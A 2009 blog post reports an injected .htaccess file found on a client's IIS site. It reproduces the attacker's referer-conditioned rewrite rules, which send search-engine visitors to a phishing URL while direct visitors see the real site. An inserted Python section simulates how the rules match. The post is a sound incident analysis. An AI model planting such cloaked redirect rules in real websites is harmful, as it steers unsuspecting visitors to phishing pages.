Thursday, January 22nd, 2009 | author:

I very recently found a problem with a client’s web site caused by a .htaccess file. The site was hosted on a Windows server running IIS with IISPassword, which uses .htaccess files for its settings.

IISPassword doesn’t follow exactly the same rules as Apache, however. If a .htaccess file exists it must contain IISPassword-appropriate directives; otherwise the server returns only the following error:

Error 500 given by IIS Password
Here’s the content of the .htaccess file. I’ve only altered the final redirection URL:

# Referer-conditioned rules: the conditions are chained with OR, so any one match triggers the redirect
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
# Redirect any matching visitor; the destination URL was altered before posting
RewriteRule .* HTTP:// [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only visitors who reached the site through one of the search engines and indexes listed in the .htaccess would be redirected to the iffy phishing URL that the cracker wants victims to reach.
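To show why the site owner never sees the redirect while search-engine visitors do, here is an added Python example (not from the original post) that evaluates this style of referer-conditioned RewriteCond chain, OR and NC flags included, against sample Referer headers. The rule text is a constructed copy of the file above with a placeholder redirect target.

```python
import re
# Constructed copy of the referer-conditioned rules the post describes;
# the redirect target is a placeholder, not the real phishing URL.
MALICIOUS_HTACCESS = """
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://redirect-target.invalid/ [R,L]
"""
COND_RE = re.compile(r"^RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?$")
RULE_RE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?$")

def parse_htaccess(text):
    """Return [(conds, target)]; conds is a list of (pattern, flag-set) on HTTP_REFERER."""
    rules, conds = [], []
    for line in text.splitlines():
        if m := COND_RE.match(line.strip()):
            flags = {f.strip().upper() for f in (m.group(2) or "").split(",") if f.strip()}
            conds.append((m.group(1), flags))
        elif m := RULE_RE.match(line.strip()):
            rules.append((conds, m.group(2)))
            conds = []  # conditions apply only to the next RewriteRule
    return rules

def conds_match(conds, referer):
    """mod_rewrite semantics: a run of [OR] conditions ending in a non-OR one forms
    one OR group; groups are ANDed. NC makes the pattern case-insensitive."""
    i, result = 0, True
    while i < len(conds):
        group = []
        while i < len(conds):
            group.append(conds[i])
            i += 1
            if "OR" not in group[-1][1]:
                break
        result = result and any(
            re.search(p, referer, re.I if "NC" in f else 0) for p, f in group)
    return result

def redirect_target(text, referer):
    """Where a visitor arriving with this Referer is sent, or None if they see the real site."""
    for conds, target in parse_htaccess(text):
        if conds_match(conds, referer):
            return target
    return None
```

A direct visit (empty Referer) returns None, which is exactly what the owner checking their own site sees; a Referer containing any listed engine name, or merely the substring "ya" because of the loose final pattern, returns the redirect target.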

Of course, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t support these mod_rewrite rules at all. Either way, this is very worrying, as I can foresee many arguments about whether or not the site is working.
